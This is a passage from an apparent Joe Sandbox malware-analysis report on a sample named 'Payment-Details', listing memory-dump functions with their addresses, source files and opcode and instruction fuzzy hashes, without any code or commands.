                                        • Opcode Fuzzy Hash: bc3c0391f71e439257b8fbdd7573229df567484ee1d9161e8f34369bad303dce
                                        • Instruction Fuzzy Hash: 35E01AB1D05308EFCB95DFA9D84469DFBF9EB49300F5085A9D814A3310E7759A91DF80
                                        Function 066F1E9A Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72f6c911336c910c55e5cae71b2ceb625ff174e08612d9780c49a8c0a8d8f05e
                                        • Instruction ID: a9f1401075cea384896a2544543f922b9f5b87e6801aa4d62114d1c6de68c0f7
                                        • Opcode Fuzzy Hash: 72f6c911336c910c55e5cae71b2ceb625ff174e08612d9780c49a8c0a8d8f05e
                                        • Instruction Fuzzy Hash: 8DF0F871905118DFDB50CF54DC54B9AB7BAFB0A300F4041E5E649A3240C7349EC48F51
                                        Function 066F47B0 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: edddd48121da8d5d69692ad0ebcf5eb6f977086b26fa1c9b7aa4f577799beeba
                                        • Instruction ID: 35279bbf687cfec8b988e01466384912024d4b0d27c5f343a44865290b5bcc3c
                                        • Opcode Fuzzy Hash: edddd48121da8d5d69692ad0ebcf5eb6f977086b26fa1c9b7aa4f577799beeba
                                        • Instruction Fuzzy Hash: ABE0CDB0819304FBD3A49B61DD06B6F766EC703224F50419CE51562652DE721861C792
                                        Function 0723E708 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ac33000ef3a6b921a89e62efa02b3a723c0f383008ad5067a495aa52c105cbd
                                        • Instruction ID: f097fb4df4c36d2c34efcd172f2273c9846be7560550b7030376411307398228
                                        • Opcode Fuzzy Hash: 9ac33000ef3a6b921a89e62efa02b3a723c0f383008ad5067a495aa52c105cbd
                                        • Instruction Fuzzy Hash: A2E01AF4D14208EFCB44DF98D840AADFBF8EB49301F10C1AAE85897351D631AA56DB91
                                        Function 07256398 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 463d7ce30edc66752083a9003822436b9f7b3556f19b652fc9f6128993036d6b
                                        • Instruction ID: 65e79ed72a0f2cde3dfcb193e46c1bc3ce6d36f40a4b1e5bf0ba3b3dc397c42a
                                        • Opcode Fuzzy Hash: 463d7ce30edc66752083a9003822436b9f7b3556f19b652fc9f6128993036d6b
                                        • Instruction Fuzzy Hash: 8BE046B0E14309EFCB54EFA8D8442ADBBF5EB49700F5081A9C808A3320D7389A81DF81
                                        Function 070EA098 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3181e04d7e5bd28cfd54666f04bacbe530b78008fd4d5ab6ed65d288603d2191
                                        • Instruction ID: ce1d5069f648a8c66bbbc9c13c9d79a144fd1c2570ac74a412306ff318601108
                                        • Opcode Fuzzy Hash: 3181e04d7e5bd28cfd54666f04bacbe530b78008fd4d5ab6ed65d288603d2191
                                        • Instruction Fuzzy Hash: CFE01AB4D04208EFCB54DFA8D9446BCFBB9EB49310F10C1AADC54A3351D6359A92DB91
                                        Function 066F3428 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4fdd946a0b9a8763549c9bc49eb5efb5085b8b301b2edbeb0fca3f17c137597
                                        • Instruction ID: aeb4af4f237cb3112068156d6a69a34372e988dc5de600673f0a8bba5b8e19f4
                                        • Opcode Fuzzy Hash: f4fdd946a0b9a8763549c9bc49eb5efb5085b8b301b2edbeb0fca3f17c137597
                                        • Instruction Fuzzy Hash: CDE01A74D04208EFCB85DF98D8456ACFBB5EB49310F10C1EADD5463351D6369A92DB81
                                        Function 0752E570 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9eb67932df4437cde13e1eb33fee48f681565d09859f389c2b00d0ebeec24a9
                                        • Instruction ID: 62cb192f7a38da2e61ff60fc13fb330e8a2edab68da094a7344c143e52f250b2
                                        • Opcode Fuzzy Hash: b9eb67932df4437cde13e1eb33fee48f681565d09859f389c2b00d0ebeec24a9
                                        • Instruction Fuzzy Hash: 12E086F4908218EBCB44DF94D845AADBBB9EB47310F50C199E84457391D6319A82EB90
                                        Function 072574FF Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6f1c64dcdaeaa00b5c24d0990173a989fd3139c1b686e45caae9f507c569c45
                                        • Instruction ID: ac91ff4a6642d90387015186e555a34bf5b5d2f15da28f3269237bf0ccb6614b
                                        • Opcode Fuzzy Hash: e6f1c64dcdaeaa00b5c24d0990173a989fd3139c1b686e45caae9f507c569c45
                                        • Instruction Fuzzy Hash: 13F0F8B4A0121ACBDB20DF54D884BADBBB2FB89300F5081A9980AB7345DB305E85DF61
                                        Function 072572DB Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47a459065ca6d350f14bc9b7c59db9b209279c71911ef3c7999f746ec99e480e
                                        • Instruction ID: 5c806d118dbe531b5a448b8cecec75375f6e0314ddc879d4d53274a0f2cd640f
                                        • Opcode Fuzzy Hash: 47a459065ca6d350f14bc9b7c59db9b209279c71911ef3c7999f746ec99e480e
                                        • Instruction Fuzzy Hash: 3DF015709011188FC7109F70D88879EBBB6FB4A310F108299D919A7294CB30AD84CF50
                                        Function 070E9E18 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 454a9a37d1509a1799edf9ebbe0325474afb3348ffece01cf5137be8370c6079
                                        • Instruction ID: 243cbbb7782436b5a03891ce9da695c57e21b99f422c038e8bc40ddc4e374f3a
                                        • Opcode Fuzzy Hash: 454a9a37d1509a1799edf9ebbe0325474afb3348ffece01cf5137be8370c6079
                                        • Instruction Fuzzy Hash: 32E086B4D15208DFC780DFA8C444A5CBBF8EF09204F5041E9D904D3320E730AE40CB41
                                        Function 070EB596 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e413e68dcbfa2256dd0682fe2a10b98fbe61562b825644dc906233ef8f4789a
                                        • Instruction ID: 821adebdf10cf91044182e1ff912a8160f19076eaf3a2aca7bbb7a7eec6b5a3c
                                        • Opcode Fuzzy Hash: 8e413e68dcbfa2256dd0682fe2a10b98fbe61562b825644dc906233ef8f4789a
                                        • Instruction Fuzzy Hash: 1CE0B6B1915358EFCB90DFA8D8897ADBBF8EB09311F6042A99949A3251E6305A84CB41
                                        Function 070E52D8 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c68e607f6d6ac41891644af624f7c724916c097de9cb8be153ed4f7c4da301c
                                        • Instruction ID: b6da5f78eb289d26a9ba291e5f90b74b46209ebd7a73778da0d47fa74b47b8e9
                                        • Opcode Fuzzy Hash: 6c68e607f6d6ac41891644af624f7c724916c097de9cb8be153ed4f7c4da301c
                                        • Instruction Fuzzy Hash: 0BE086B4A04208EFCB04DF94EC45A6DBBB9EB47314F10C19DDC0463350C6315E92DB91
                                        Function 075276A0 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 007e3a9bfec1f711a246e9f1683f4b7ffb038ddf3ad4e0ef2ca46d6f37624683
                                        • Instruction ID: 887e73e7823c9e1937868fb2fc73c74efef9831f80a1e6db62378d33c47d9845
                                        • Opcode Fuzzy Hash: 007e3a9bfec1f711a246e9f1683f4b7ffb038ddf3ad4e0ef2ca46d6f37624683
                                        • Instruction Fuzzy Hash: 8CE04FB4D04258EFCB44DF99D4406ACFBB5EB4A300F10C5EAD85867391D7356A42DF94
                                        Function 07239698 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15a8566138ca42ddcf20d8a9f80025ab135148925dba47a5fefb0d32d710979d
                                        • Instruction ID: bc1dfb7c7a565f4f84e73ad217753411dcdc04702fd2ab929f6673cfb2a4e031
                                        • Opcode Fuzzy Hash: 15a8566138ca42ddcf20d8a9f80025ab135148925dba47a5fefb0d32d710979d
                                        • Instruction Fuzzy Hash: 9DE04FB4D05208EFCB44DF99D5506ACFBF4EB4A204F10C1EDD85853351D6756A82DF80
                                        Function 0723F1E0 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e03833cebf926929d6db8347f171b67ed4487bbef5fbc90cd7f9b0d250e6399d
                                        • Instruction ID: 32d5b67340da043bfa01466f629098320874f08827d9ba5417dbefc724f79a88
                                        • Opcode Fuzzy Hash: e03833cebf926929d6db8347f171b67ed4487bbef5fbc90cd7f9b0d250e6399d
                                        • Instruction Fuzzy Hash: 7CE086B0D14308EFC780DFACE94475CBBF4EB09200F2082A9C848D3350D6719E81CB40
                                        Function 0725D748 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d39de6f39a2ad9cd981de93b3973a6c770bd7d88afd9f7bded1537c6393290f
                                        • Instruction ID: 939e9351973ea82a3caeb2ced132cac4122b9f5e2b1989727a5260cd3a45159f
                                        • Opcode Fuzzy Hash: 6d39de6f39a2ad9cd981de93b3973a6c770bd7d88afd9f7bded1537c6393290f
                                        • Instruction Fuzzy Hash: 6BE0ECB4D25308EFCB44EFA8D98979DBBB4EB05205F5041A99D09A3250EB705A80CB45
                                        Function 07256418 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 434d8e024cfb117aa1169e442db5bbde25bb62cd689c63fe568a08b05e2464db
                                        • Instruction ID: a13cdd5755f72e8a6cbfd7ab9c39a4be5a538c7ea27f2aaa48be194ef75889d1
                                        • Opcode Fuzzy Hash: 434d8e024cfb117aa1169e442db5bbde25bb62cd689c63fe568a08b05e2464db
                                        • Instruction Fuzzy Hash: 62E0ECB0E25308EFCB54DFA8E84979DBBF4EB05601F9041A9D948A3250E7705A80CB51
                                        Function 070E3FC8 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56226b2ef184514cd7c34283bbd791b800b0f6684ea483c84daab69c4b0ae419
                                        • Instruction ID: c92ea3d0e27b1808db08229713e7195ca8f8c4f878e94bc790d569574bc9759e
                                        • Opcode Fuzzy Hash: 56226b2ef184514cd7c34283bbd791b800b0f6684ea483c84daab69c4b0ae419
                                        • Instruction Fuzzy Hash: 9CE0C2B4908208EFCB04DF95D840A6CFBB8EB46311F20829CD80823360CA329E42CB80
                                        Function 070EB598 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93a62a6b3b04edf43c674c5b4994d1af0e23d56ef7060828d8f41c0e12f3bca2
                                        • Instruction ID: 5d15bbd451270aa8dd020f5f85bd537e96c6e3e9e0e4c9ab8fe72242fa7f3c89
                                        • Opcode Fuzzy Hash: 93a62a6b3b04edf43c674c5b4994d1af0e23d56ef7060828d8f41c0e12f3bca2
                                        • Instruction Fuzzy Hash: C2E0ECF1D15348EFCB90DFA8D8897ADBBF8EB05311F5042A99949A3350E6305A84CB41
                                        Function 070E78E8 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0ad0c0e7dee31908323817a9e05026dcf2e0857099de0e6d82677e438244030
                                        • Instruction ID: f5268db7771cc0a6fd33b70e081acb4bd522af1ac75a9d0f301f61865fa2d9c8
                                        • Opcode Fuzzy Hash: c0ad0c0e7dee31908323817a9e05026dcf2e0857099de0e6d82677e438244030
                                        • Instruction Fuzzy Hash: 34E017F294120CEFDB90EBF4890479E77E9DF59200F5146A9D549A3120EA354A80A7A6
                                        Function 066F3DE8 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction ID: c00f38acfa43ba7162ec0d323bf8be330c1e8f349fff04939a113d5d4198924a
                                        • Opcode Fuzzy Hash: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction Fuzzy Hash: 3EE08C74908208EBCB44DF94D84166CBBB8EB45300F609199C80823350CB315E42CBC0
                                        Function 066F37D0 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction ID: 6fb577c1ed6e9bd7754937be10da6114dc7ab9020d57c171576310703c2ea895
                                        • Opcode Fuzzy Hash: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction Fuzzy Hash: 97E0C274D08308EFCB44DFA4D8406ACBBB4EB45300F208198C80823350C6326E82CBC4
                                        Function 07529F30 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ce239d43f3c976336f58773f943401f355f7b78d74e7501cd190b9afd082a49
                                        • Instruction ID: 17d64e4e8002984415f85a28b53aeeaf26b1e8f22f4a94888cff1222e74cc68a
                                        • Opcode Fuzzy Hash: 8ce239d43f3c976336f58773f943401f355f7b78d74e7501cd190b9afd082a49
                                        • Instruction Fuzzy Hash: 42E0ECB4D15258EFCB80DFA8D84979DBBB4EB06205F5051E9D908A3350E7305A81DB51
                                        Function 0752C7B8 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2e505ebed69e3f8e97e4651ddf1d716f8140546028d4e8e41c8ea346a6f1a7d
                                        • Instruction ID: a147e981cbc77891be39012ae466da5429249e9228173e94403d63352e6b3280
                                        • Opcode Fuzzy Hash: c2e505ebed69e3f8e97e4651ddf1d716f8140546028d4e8e41c8ea346a6f1a7d
                                        • Instruction Fuzzy Hash: E7E0C2B4908208EBCB04EF94D840AACBBB8FB46310F24819DC80823391CB316E43DB90
                                        Function 019F6BC9 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c84e1be94c84c141e2154ddec317161ceb0b9c5c7e7ba81eab2fb5beb9edb97f
                                        • Instruction ID: e94adf476b9db40f967a9f68dd813f72a6e0fdb2ad0f140552f94ae1807cb374
                                        • Opcode Fuzzy Hash: c84e1be94c84c141e2154ddec317161ceb0b9c5c7e7ba81eab2fb5beb9edb97f
                                        • Instruction Fuzzy Hash: BEE05B3225C30D9FD752EF95D4509413BF8BF257343058067E648CB032E325C965DB61
                                        Function 019F5510 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e005aa7785f232497a404dd6ae012074563069052301210216cfc07c9ecc8a0f
                                        • Instruction ID: 3b399964371416071839d7d61e60ac098216c2dda845a257c0e5995e88c3a3be
                                        • Opcode Fuzzy Hash: e005aa7785f232497a404dd6ae012074563069052301210216cfc07c9ecc8a0f
                                        • Instruction Fuzzy Hash: 98E04F34900208EFCB00DFA4E54456DBBBDFB88311B2086A4EC0893304EB315E04DB82
                                        Function 019FF6E8 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 829e6d2841f4f04bc7781c1f936d71ceaee7e8409bad508515c593596327b408
                                        • Instruction ID: e6bbe27dfbb0704411625f888b8ffc02570ffc22bfa194ce8e9819278213efaf
                                        • Opcode Fuzzy Hash: 829e6d2841f4f04bc7781c1f936d71ceaee7e8409bad508515c593596327b408
                                        • Instruction Fuzzy Hash: C0E012B181130CEFD710EFF4D90475E7BBDDB4A201F1046A9D609A3160FE314A809BD2
                                        Function 0723AF98 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aaa965b5d22ed8e9b6d3f3a5ae364585f279ab363f55c61bb1695e9735a591bc
                                        • Instruction ID: f04e278655d113515b08176b3b4ae8dfc452d935cb63ef386913c4c20f1f43a1
                                        • Opcode Fuzzy Hash: aaa965b5d22ed8e9b6d3f3a5ae364585f279ab363f55c61bb1695e9735a591bc
                                        • Instruction Fuzzy Hash: 86E0C2F4919208EBCB04DF94D84066CFBB8EB46300F20C1ADE84823350CA329E82CB80
                                        Function 072393E0 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b80a0a9682d6e1354c3dd66cf18f2515cdc092fda113b0bc2676e39f0f3e2d
                                        • Instruction ID: 8ab95cce148cc5aeafad85a570dd3c43e99ddd04820688bee84c1dd2957f70f1
                                        • Opcode Fuzzy Hash: f9b80a0a9682d6e1354c3dd66cf18f2515cdc092fda113b0bc2676e39f0f3e2d
                                        • Instruction Fuzzy Hash: 85E08CF0C24308EFCB80EFB8848439CBBB9EB06205F6040A8C848A3250E6745AC0CB40
                                        Function 07256718 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95dbfdaacdddb928bb1d277c0572a05ea8fb0ce0da6f70d290faf790c7213a20
                                        • Instruction ID: b9b32385d461b10b1fbbd1999106981b675122e707fa78fc81b5e00e426f06d3
                                        • Opcode Fuzzy Hash: 95dbfdaacdddb928bb1d277c0572a05ea8fb0ce0da6f70d290faf790c7213a20
                                        • Instruction Fuzzy Hash: B6D05BB0D69308DBC714DFA4D94466D7B79EB46301F504198D80533650D7701D81D755
                                        Function 07259688 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f9da61f32abc826aab56c11d569f09390cb61b37889eb126db0ed0fb154249f
                                        • Instruction ID: 69cb62ddbb9f9d78bd12711a77246fe9fc4fee1b18d99efd15473b978db8d1f1
                                        • Opcode Fuzzy Hash: 9f9da61f32abc826aab56c11d569f09390cb61b37889eb126db0ed0fb154249f
                                        • Instruction Fuzzy Hash: 11E0C270A00208EFDF00DFB4D80076DB7BEEB85204F018599D808DB300EA712E009B90
                                        Function 070E9E60 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d04478f1c5753c0b4cd230623cf072bf141efd36afc6f5379c57499f437e3379
                                        • Instruction ID: f27fb3c20a76c812d75124a05231f9c77b9b903d84cfc0758ec77ab1332b5409
                                        • Opcode Fuzzy Hash: d04478f1c5753c0b4cd230623cf072bf141efd36afc6f5379c57499f437e3379
                                        • Instruction Fuzzy Hash: 73E012B4D18208EFCB84EFE8D84939CBBF9EB09205F5041AADD4993350E7305A80CB52
                                        Function 019F6AF8 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07ee001765ad0567be21abe7c747a5294be4a049192ed51d374fbaafaee68de4
                                        • Instruction ID: f8d95a0c7e6578bd03a2de9817763c463508cbceb114bbdb0b922c6bbc8c241a
                                        • Opcode Fuzzy Hash: 07ee001765ad0567be21abe7c747a5294be4a049192ed51d374fbaafaee68de4
